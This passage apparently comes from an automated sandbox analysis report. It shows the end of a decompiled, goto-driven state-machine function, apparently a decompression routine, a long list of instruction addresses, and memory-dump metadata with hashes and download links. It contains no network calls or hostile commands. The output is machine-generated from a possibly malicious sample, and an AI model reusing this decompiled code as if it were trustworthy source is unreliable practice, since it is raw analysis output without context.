												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                                    0x00406945
                                                                                    0x00406945
                                                                                    0x00406945
                                                                                    0x00406945
                                                                                    0x00406945
                                                                                    0x00406949
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040694f
                                                                                    0x0040694f
                                                                                    0x00406952
                                                                                    0x00406955
                                                                                    0x0040695a
                                                                                    0x0040695c
                                                                                    0x0040695f
                                                                                    0x00406962
                                                                                    0x00406965
                                                                                    0x00406965
                                                                                    0x00406968
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040696a
                                                                                    0x0040696a
                                                                                    0x0040696d
                                                                                    0x00406972
                                                                                    0x00406974
                                                                                    0x00406977
                                                                                    0x0040697d
                                                                                    0x004066dc
                                                                                    0x004066dc
                                                                                    0x004066df
                                                                                    0x004066e5
                                                                                    0x004066eb
                                                                                    0x004066f4
                                                                                    0x004066fa
                                                                                    0x004066fd
                                                                                    0x00406704
                                                                                    0x00406709
                                                                                    0x0040670f
                                                                                    0x0040671a
                                                                                    0x0040671a
                                                                                    0x00406983
                                                                                    0x00406983
                                                                                    0x0040698d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406993
                                                                                    0x00406993
                                                                                    0x00406997
                                                                                    0x0040699a
                                                                                    0x0040699a
                                                                                    0x0040699e
                                                                                    0x004069a4
                                                                                    0x004069a4
                                                                                    0x004069a7
                                                                                    0x004069aa
                                                                                    0x004069b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004069b2
                                                                                    0x004069d4
                                                                                    0x004069d4
                                                                                    0x004069d7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004069b4
                                                                                    0x004069b8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004069be
                                                                                    0x004069be
                                                                                    0x004069c1
                                                                                    0x004069c4
                                                                                    0x004069c9
                                                                                    0x004069cb
                                                                                    0x004069ce
                                                                                    0x004069d1
                                                                                    0x004069d1
                                                                                    0x004069d9
                                                                                    0x004069d9
                                                                                    0x004069df
                                                                                    0x004069e2
                                                                                    0x004069e5
                                                                                    0x004069e5
                                                                                    0x004069ec
                                                                                    0x004069f0
                                                                                    0x004069f4
                                                                                    0x004069f7
                                                                                    0x004069fa
                                                                                    0x00406a00
                                                                                    0x00406a05
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a07
                                                                                    0x00406a1b
                                                                                    0x00406a1b
                                                                                    0x00406a1f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a09
                                                                                    0x00406a0c
                                                                                    0x00406a0c
                                                                                    0x00406a13
                                                                                    0x00406a18
                                                                                    0x00406a18
                                                                                    0x00406a18
                                                                                    0x00406a21
                                                                                    0x00406a21
                                                                                    0x00406a24
                                                                                    0x00406a32
                                                                                    0x00406a38
                                                                                    0x00406a3d
                                                                                    0x00406a43
                                                                                    0x00406a49
                                                                                    0x00406a4f
                                                                                    0x00406a56
                                                                                    0x00406a6a
                                                                                    0x00406a6a
                                                                                    0x00407039
                                                                                    0x00407039
                                                                                    0x00407039
                                                                                    0x0040703e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406676
                                                                                    0x00406676
                                                                                    0x00000000
                                                                                    0x00406c71
                                                                                    0x00406c71
                                                                                    0x00406c75
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00406c7e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c84
                                                                                    0x00406c84
                                                                                    0x00406ca9
                                                                                    0x00406ca9
                                                                                    0x00406ca9
                                                                                    0x00406cab
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c89
                                                                                    0x00406c89
                                                                                    0x00406c8d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c93
                                                                                    0x00406c93
                                                                                    0x00406c96
                                                                                    0x00406c99
                                                                                    0x00406c9c
                                                                                    0x00406c9e
                                                                                    0x00406ca0
                                                                                    0x00406ca3
                                                                                    0x00406ca6
                                                                                    0x00406ca6
                                                                                    0x00406ca6
                                                                                    0x00406cad
                                                                                    0x00406cad
                                                                                    0x00406cb5
                                                                                    0x00406cb8
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc2
                                                                                    0x00406cc5
                                                                                    0x00406cc7
                                                                                    0x00406cca
                                                                                    0x00406ccc
                                                                                    0x00406ce0
                                                                                    0x00406ce0
                                                                                    0x00406ce3
                                                                                    0x00406cfd
                                                                                    0x00406cfd
                                                                                    0x00406d00
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d06
                                                                                    0x00406d06
                                                                                    0x00406d09
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0f
                                                                                    0x00406d0f
                                                                                    0x00000000
                                                                                    0x00406d0f
                                                                                    0x00406ce5
                                                                                    0x00406ce8
                                                                                    0x00406cef
                                                                                    0x00406cf2
                                                                                    0x00000000
                                                                                    0x00406cf2
                                                                                    0x00406cce
                                                                                    0x00406cd2
                                                                                    0x00406cd5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d1a
                                                                                    0x00406d1a
                                                                                    0x00406d3f
                                                                                    0x00406d3f
                                                                                    0x00406d3f
                                                                                    0x00406d41
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d1f
                                                                                    0x00406d1f
                                                                                    0x00406d23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d34
                                                                                    0x00406d36
                                                                                    0x00406d39
                                                                                    0x00406d3c
                                                                                    0x00406d3c
                                                                                    0x00406d3c
                                                                                    0x00406d43
                                                                                    0x00406d4b
                                                                                    0x00406d4e
                                                                                    0x00406d51
                                                                                    0x00406d53
                                                                                    0x00406d56
                                                                                    0x00406d56
                                                                                    0x00406d58
                                                                                    0x00406d5c
                                                                                    0x00406d5f
                                                                                    0x00406d62
                                                                                    0x00406d65
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d6b
                                                                                    0x00406d6b
                                                                                    0x00406d90
                                                                                    0x00406d90
                                                                                    0x00406d90
                                                                                    0x00406d92
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d70
                                                                                    0x00406d70
                                                                                    0x00406d74
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d7a
                                                                                    0x00406d7a
                                                                                    0x00406d7d
                                                                                    0x00406d80
                                                                                    0x00406d83
                                                                                    0x00406d85
                                                                                    0x00406d87
                                                                                    0x00406d8a
                                                                                    0x00406d8d
                                                                                    0x00406d8d
                                                                                    0x00406d8d
                                                                                    0x00406d94
                                                                                    0x00406d94
                                                                                    0x00406d9c
                                                                                    0x00406d9f
                                                                                    0x00406da2
                                                                                    0x00406da5
                                                                                    0x00406da9
                                                                                    0x00406dac
                                                                                    0x00406dae
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406dce
                                                                                    0x00406dce
                                                                                    0x00406dd1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406dd7
                                                                                    0x00406dd7
                                                                                    0x00406dda
                                                                                    0x00406de1
                                                                                    0x00000000
                                                                                    0x00406de1
                                                                                    0x00406db6
                                                                                    0x00406db9
                                                                                    0x00406dc0
                                                                                    0x00406dc3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406de9
                                                                                    0x00406de9
                                                                                    0x00406e0e
                                                                                    0x00406e0e
                                                                                    0x00406e0e
                                                                                    0x00406e10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406dee
                                                                                    0x00406dee
                                                                                    0x00406df2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfb
                                                                                    0x00406dfe
                                                                                    0x00406e01
                                                                                    0x00406e03
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0b
                                                                                    0x00406e0b
                                                                                    0x00406e0b
                                                                                    0x00406e12
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e22
                                                                                    0x00406e25
                                                                                    0x00406e25
                                                                                    0x00406e27
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e2d
                                                                                    0x00406e2d
                                                                                    0x00406e30
                                                                                    0x00406e35
                                                                                    0x00406e37
                                                                                    0x00406e3d
                                                                                    0x00406e3f
                                                                                    0x00406e54
                                                                                    0x00406e56
                                                                                    0x00406e56
                                                                                    0x00406e41
                                                                                    0x00406e47
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e4b
                                                                                    0x00406e58
                                                                                    0x00406e5c
                                                                                    0x00406e5f
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e68
                                                                                    0x00406e68
                                                                                    0x00406e68
                                                                                    0x00406e6a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e70
                                                                                    0x00406e70
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e9d
                                                                                    0x00406ea0
                                                                                    0x00406ea6
                                                                                    0x00406eab
                                                                                    0x00406eb1
                                                                                    0x00406eb7
                                                                                    0x00406eb9
                                                                                    0x00406ebc
                                                                                    0x00406ec5
                                                                                    0x00406ecb
                                                                                    0x00406ecb
                                                                                    0x00406ebe
                                                                                    0x00406ec0
                                                                                    0x00406ec2
                                                                                    0x00406ec2
                                                                                    0x00406ecd
                                                                                    0x00406ed3
                                                                                    0x00406ed5
                                                                                    0x00406ed8
                                                                                    0x00406eda
                                                                                    0x00406ee0
                                                                                    0x00406ee2
                                                                                    0x00406ee4
                                                                                    0x00406ee6
                                                                                    0x00406ee8
                                                                                    0x00406eeb
                                                                                    0x00406ef4
                                                                                    0x00406ef7
                                                                                    0x00406ef7
                                                                                    0x00406eed
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef0
                                                                                    0x00406eeb
                                                                                    0x00406ee2
                                                                                    0x00406ef9
                                                                                    0x00406efb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406efb
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e80
                                                                                    0x00406e86
                                                                                    0x00406e88
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e8a
                                                                                    0x00406e8a
                                                                                    0x00406e8c
                                                                                    0x00406e8e
                                                                                    0x00406e97
                                                                                    0x00406e97
                                                                                    0x00406e90
                                                                                    0x00406e90
                                                                                    0x00406e93
                                                                                    0x00406e93
                                                                                    0x00406e99
                                                                                    0x00406e9b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f01
                                                                                    0x00406f01
                                                                                    0x00406f06
                                                                                    0x00406f08
                                                                                    0x00406f09
                                                                                    0x00406f0a
                                                                                    0x00406f0b
                                                                                    0x00406f11
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1c
                                                                                    0x00406f22
                                                                                    0x00406f22
                                                                                    0x00406f25
                                                                                    0x00406f25
                                                                                    0x00406f25
                                                                                    0x00406f25
                                                                                    0x00406f2e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f33
                                                                                    0x00406f33
                                                                                    0x00406f36
                                                                                    0x00406f39
                                                                                    0x00406f3b
                                                                                    0x00406fd2
                                                                                    0x00406fd2
                                                                                    0x00406fd5
                                                                                    0x00406fd7
                                                                                    0x00406fd8
                                                                                    0x00406fd9
                                                                                    0x00406fdc
                                                                                    0x00000000
                                                                                    0x00406fdc
                                                                                    0x00406f41
                                                                                    0x00406f41
                                                                                    0x00406f47
                                                                                    0x00406f49
                                                                                    0x00406f6e
                                                                                    0x00406f71
                                                                                    0x00406f77
                                                                                    0x00406f7c
                                                                                    0x00406f82
                                                                                    0x00406f88
                                                                                    0x00406f8a
                                                                                    0x00406f8d
                                                                                    0x00406f96
                                                                                    0x00406f9c
                                                                                    0x00406f9c
                                                                                    0x00406f8f
                                                                                    0x00406f91
                                                                                    0x00406f93
                                                                                    0x00406f93
                                                                                    0x00406f9e
                                                                                    0x00406fa4
                                                                                    0x00406fa6
                                                                                    0x00406fa9
                                                                                    0x00406fab
                                                                                    0x00406fb1
                                                                                    0x00406fb3
                                                                                    0x00406fb5
                                                                                    0x00406fb7
                                                                                    0x00406fb9
                                                                                    0x00406fbc
                                                                                    0x00406fc5
                                                                                    0x00406fc8
                                                                                    0x00406fc8
                                                                                    0x00406fbe
                                                                                    0x00406fbe
                                                                                    0x00406fc1
                                                                                    0x00406fc1
                                                                                    0x00406fbc
                                                                                    0x00406fb3
                                                                                    0x00406fca
                                                                                    0x00406fcc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406fcc
                                                                                    0x00406f4b
                                                                                    0x00406f4b
                                                                                    0x00406f51
                                                                                    0x00406f57
                                                                                    0x00406f59
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f5b
                                                                                    0x00406f5b
                                                                                    0x00406f5d
                                                                                    0x00406f5f
                                                                                    0x00406f66
                                                                                    0x00406f66
                                                                                    0x00406f68
                                                                                    0x00406f61
                                                                                    0x00406f61
                                                                                    0x00406f63
                                                                                    0x00406f63
                                                                                    0x00406f6a
                                                                                    0x00406f6c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406fe4
                                                                                    0x00406fe4
                                                                                    0x00406fe7
                                                                                    0x00406fe9
                                                                                    0x00406fec
                                                                                    0x00406fef
                                                                                    0x00406fef
                                                                                    0x00406fef
                                                                                    0x00406fef
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040669d
                                                                                    0x00406681
                                                                                    0x00000000
                                                                                    0x00406687
                                                                                    0x0040668a
                                                                                    0x00406694
                                                                                    0x00406697
                                                                                    0x0040669a
                                                                                    0x00000000
                                                                                    0x0040669a
                                                                                    0x00406681
                                                                                    0x004066a5
                                                                                    0x004066a8
                                                                                    0x004066ac
                                                                                    0x004066b6
                                                                                    0x004066c0
                                                                                    0x004066c3
                                                                                    0x004066c9
                                                                                    0x004067fd
                                                                                    0x004067ff
                                                                                    0x00406805
                                                                                    0x00406808
                                                                                    0x0040680b
                                                                                    0x00000000
                                                                                    0x0040680b
                                                                                    0x004066cf
                                                                                    0x004066cf
                                                                                    0x004066d0
                                                                                    0x00406728
                                                                                    0x00406728
                                                                                    0x0040672f
                                                                                    0x004067d5
                                                                                    0x004067d5
                                                                                    0x004067da
                                                                                    0x004067dd
                                                                                    0x004067e2
                                                                                    0x004067e5
                                                                                    0x004067ea
                                                                                    0x004067ed
                                                                                    0x004067f2
                                                                                    0x004067f5
                                                                                    0x004067f5
                                                                                    0x00000000
                                                                                    0x00406735
                                                                                    0x00406735
                                                                                    0x00406735
                                                                                    0x00406735
                                                                                    0x00406739
                                                                                    0x00406739
                                                                                    0x0040675b
                                                                                    0x0040675e
                                                                                    0x00406760
                                                                                    0x00406763
                                                                                    0x00406768
                                                                                    0x0040673e
                                                                                    0x0040673e
                                                                                    0x00406743
                                                                                    0x00406745
                                                                                    0x00406747
                                                                                    0x0040674c
                                                                                    0x00406752
                                                                                    0x00406757
                                                                                    0x00406759
                                                                                    0x00406759
                                                                                    0x0040674e
                                                                                    0x0040674e
                                                                                    0x0040674e
                                                                                    0x0040674c
                                                                                    0x00000000
                                                                                    0x0040676a
                                                                                    0x00406797
                                                                                    0x0040679c
                                                                                    0x0040679e
                                                                                    0x0040679f
                                                                                    0x004067a1
                                                                                    0x004067a2
                                                                                    0x004067a2
                                                                                    0x004067a2
                                                                                    0x004067ca
                                                                                    0x004067cf
                                                                                    0x004067cf
                                                                                    0x00000000
                                                                                    0x004067cf
                                                                                    0x00406768
                                                                                    0x0040672f
                                                                                    0x004066d2
                                                                                    0x004066d2
                                                                                    0x004066d3
                                                                                    0x0040671d
                                                                                    0x00000000
                                                                                    0x0040671d
                                                                                    0x004066d5
                                                                                    0x004066d6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406832
                                                                                    0x00406832
                                                                                    0x00406832
                                                                                    0x00406835
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406812
                                                                                    0x00406812
                                                                                    0x00406816
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040681c
                                                                                    0x0040681c
                                                                                    0x0040681f
                                                                                    0x00406822
                                                                                    0x00406827
                                                                                    0x00406829
                                                                                    0x0040682c
                                                                                    0x0040682f
                                                                                    0x0040682f
                                                                                    0x0040682f
                                                                                    0x00406837
                                                                                    0x00406837
                                                                                    0x0040683a
                                                                                    0x0040683c
                                                                                    0x00406841
                                                                                    0x00406844
                                                                                    0x00406846
                                                                                    0x00406849
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040684f
                                                                                    0x0040684f
                                                                                    0x00406851
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406857
                                                                                    0x00406857
                                                                                    0x0040685b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406861
                                                                                    0x00406861
                                                                                    0x00406864
                                                                                    0x00406866
                                                                                    0x00406904
                                                                                    0x00406904
                                                                                    0x00406907
                                                                                    0x00406909
                                                                                    0x00406909
                                                                                    0x0040690c
                                                                                    0x0040690f
                                                                                    0x00406911
                                                                                    0x00406913
                                                                                    0x00406915
                                                                                    0x00406915
                                                                                    0x0040691e
                                                                                    0x00406923
                                                                                    0x00406926
                                                                                    0x00406929
                                                                                    0x0040692c
                                                                                    0x0040692f
                                                                                    0x0040692f
                                                                                    0x0040692f
                                                                                    0x00406932
                                                                                    0x00406938
                                                                                    0x00406938
                                                                                    0x0040693e
                                                                                    0x0040693e
                                                                                    0x0040693e
                                                                                    0x00000000
                                                                                    0x00406932
                                                                                    0x0040686c
                                                                                    0x0040686c
                                                                                    0x00406872
                                                                                    0x00406875
                                                                                    0x00406877
                                                                                    0x004068a2
                                                                                    0x004068a5
                                                                                    0x004068ab
                                                                                    0x004068b0
                                                                                    0x004068b6
                                                                                    0x004068bc
                                                                                    0x004068be
                                                                                    0x004068c1
                                                                                    0x004068ca
                                                                                    0x004068d0
                                                                                    0x004068d0
                                                                                    0x004068c3
                                                                                    0x004068c5
                                                                                    0x004068c7
                                                                                    0x004068c7
                                                                                    0x004068d2
                                                                                    0x004068d8
                                                                                    0x004068db
                                                                                    0x004068dd
                                                                                    0x004068df
                                                                                    0x004068e5
                                                                                    0x004068e7
                                                                                    0x004068e9
                                                                                    0x004068ec
                                                                                    0x004068f5
                                                                                    0x004068f5
                                                                                    0x004068f7
                                                                                    0x004068ee
                                                                                    0x004068ee
                                                                                    0x004068f1
                                                                                    0x004068f1
                                                                                    0x004068f9
                                                                                    0x004068f9
                                                                                    0x004068e7
                                                                                    0x004068fc
                                                                                    0x004068fe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004068fe
                                                                                    0x00406879
                                                                                    0x00406879
                                                                                    0x0040687f
                                                                                    0x00406885
                                                                                    0x00406887
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406889
                                                                                    0x00406889
                                                                                    0x0040688b
                                                                                    0x0040688d
                                                                                    0x00406890
                                                                                    0x00406897
                                                                                    0x00406897
                                                                                    0x00406899
                                                                                    0x00406892
                                                                                    0x00406892
                                                                                    0x00406894
                                                                                    0x00406894
                                                                                    0x0040689b
                                                                                    0x0040689d
                                                                                    0x004068a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004069a4
                                                                                    0x004069a7
                                                                                    0x004069aa
                                                                                    0x004069b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b87
                                                                                    0x00406b87
                                                                                    0x00406b87
                                                                                    0x00406b8a
                                                                                    0x00406b8d
                                                                                    0x00406b8f
                                                                                    0x00406b92
                                                                                    0x00406b98
                                                                                    0x00406b9f
                                                                                    0x00406ba1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a75
                                                                                    0x00406a75
                                                                                    0x00406a9d
                                                                                    0x00406a9d
                                                                                    0x00406a9d
                                                                                    0x00406a9f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a7d
                                                                                    0x00406a7d
                                                                                    0x00406a81
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a87
                                                                                    0x00406a87
                                                                                    0x00406a8a
                                                                                    0x00406a8d
                                                                                    0x00406a90
                                                                                    0x00406a92
                                                                                    0x00406a94
                                                                                    0x00406a97
                                                                                    0x00406a9a
                                                                                    0x00406a9a
                                                                                    0x00406a9a
                                                                                    0x00406aa1
                                                                                    0x00406aa1
                                                                                    0x00406aa9
                                                                                    0x00406aac
                                                                                    0x00406ab2
                                                                                    0x00406ab5
                                                                                    0x00406ab9
                                                                                    0x00406abd
                                                                                    0x00406ac0
                                                                                    0x00406ac3
                                                                                    0x00406adb
                                                                                    0x00406adb
                                                                                    0x00406ade
                                                                                    0x00406aec
                                                                                    0x00406aef
                                                                                    0x00406ae0
                                                                                    0x00406ae0
                                                                                    0x00406ae2
                                                                                    0x00406ae9
                                                                                    0x00406ae9
                                                                                    0x00406b18
                                                                                    0x00406b18
                                                                                    0x00406b18
                                                                                    0x00406b1b
                                                                                    0x00406b1d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406af8
                                                                                    0x00406af8
                                                                                    0x00406afc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b02
                                                                                    0x00406b02
                                                                                    0x00406b05
                                                                                    0x00406b08
                                                                                    0x00406b0b
                                                                                    0x00406b0d
                                                                                    0x00406b0f
                                                                                    0x00406b12
                                                                                    0x00406b15
                                                                                    0x00406b15
                                                                                    0x00406b15
                                                                                    0x00406b1f
                                                                                    0x00406b1f
                                                                                    0x00406b21
                                                                                    0x00406b23
                                                                                    0x00406b2e
                                                                                    0x00406b31
                                                                                    0x00406b34
                                                                                    0x00406b36
                                                                                    0x00406b38
                                                                                    0x00406b3a
                                                                                    0x00406b3d
                                                                                    0x00406b40
                                                                                    0x00406b45
                                                                                    0x00406b48
                                                                                    0x00406b4b
                                                                                    0x00406b4e
                                                                                    0x00406b55
                                                                                    0x00406b58
                                                                                    0x00406b5a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b60
                                                                                    0x00406b60
                                                                                    0x00406b64
                                                                                    0x00406b75
                                                                                    0x00406b75
                                                                                    0x00406b75
                                                                                    0x00406b77
                                                                                    0x00406b77
                                                                                    0x00406b7b
                                                                                    0x00406b7b
                                                                                    0x00406b7b
                                                                                    0x00406b7d
                                                                                    0x00406b7e
                                                                                    0x00406b81
                                                                                    0x00406b81
                                                                                    0x00406b81
                                                                                    0x00406b84
                                                                                    0x00000000
                                                                                    0x00406b84
                                                                                    0x00406b66
                                                                                    0x00406b66
                                                                                    0x00406b69
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b6f
                                                                                    0x00406b6f
                                                                                    0x00000000
                                                                                    0x00406b6f
                                                                                    0x00406ac5
                                                                                    0x00406ac5
                                                                                    0x00406ac7
                                                                                    0x00406ac9
                                                                                    0x00406acc
                                                                                    0x00406acf
                                                                                    0x00406ad3
                                                                                    0x00406ad3
                                                                                    0x00406ba7
                                                                                    0x00406ba7
                                                                                    0x00406baa
                                                                                    0x00406bb1
                                                                                    0x00406bb5
                                                                                    0x00406bb7
                                                                                    0x00406bba
                                                                                    0x00406bbd
                                                                                    0x00406bc2
                                                                                    0x00406bc5
                                                                                    0x00406bc7
                                                                                    0x00406bc8
                                                                                    0x00406bcb
                                                                                    0x00406bd6
                                                                                    0x00406bd9
                                                                                    0x00406bf0
                                                                                    0x00406bf5
                                                                                    0x00406bfc
                                                                                    0x00406c01
                                                                                    0x00406c05
                                                                                    0x00406c07
                                                                                    0x00406c07
                                                                                    0x00406c07
                                                                                    0x00406c0a
                                                                                    0x00406c0c
                                                                                    0x00000000
                                                                                    0x00406c12
                                                                                    0x00406c12
                                                                                    0x00406c16
                                                                                    0x00406c21
                                                                                    0x00406c34
                                                                                    0x00406c39
                                                                                    0x00406c3e
                                                                                    0x00406c40
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c46
                                                                                    0x00406c46
                                                                                    0x00406c49
                                                                                    0x00406c4b
                                                                                    0x00406c59
                                                                                    0x00406c59
                                                                                    0x00406c5c
                                                                                    0x00406c5c
                                                                                    0x00406c5f
                                                                                    0x00406c62
                                                                                    0x00406c65
                                                                                    0x00406c68
                                                                                    0x00406c6b
                                                                                    0x00406c6e
                                                                                    0x00000000
                                                                                    0x00406c6e
                                                                                    0x00406c4d
                                                                                    0x00406c4d
                                                                                    0x00406c53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ff2
                                                                                    0x00406ff2
                                                                                    0x00406ff8
                                                                                    0x00406ffe
                                                                                    0x00407003
                                                                                    0x00407009
                                                                                    0x0040700f
                                                                                    0x00407011
                                                                                    0x00407014
                                                                                    0x0040701d
                                                                                    0x00407023
                                                                                    0x00407023
                                                                                    0x00407016
                                                                                    0x00407018
                                                                                    0x0040701a
                                                                                    0x0040701a
                                                                                    0x00407025
                                                                                    0x00407027
                                                                                    0x0040702a
                                                                                    0x00407065
                                                                                    0x00407065
                                                                                    0x00000000
                                                                                    0x0040702c
                                                                                    0x0040702c
                                                                                    0x0040702c
                                                                                    0x00407032
                                                                                    0x00407035
                                                                                    0x00407037
                                                                                    0x0040706c
                                                                                    0x0040706e
                                                                                    0x00000000
                                                                                    0x0040706e
                                                                                    0x00000000
                                                                                    0x00407037
                                                                                    0x00000000
                                                                                    0x00406676
                                                                                    0x00407044
                                                                                    0x00000000
                                                                                    0x00407044
                                                                                    0x00406a58
                                                                                    0x00406a5a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a5c
                                                                                    0x00406a5c
                                                                                    0x00406a5f
                                                                                    0x00000000
                                                                                    0x00406a5f
                                                                                    0x004069a4
                                                                                    0x00406965
                                                                                    0x00407049
                                                                                    0x0040704c
                                                                                    0x0040704e
                                                                                    0x00407057
                                                                                    0x0040705d
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                    • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                                    • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                    • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040711C, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
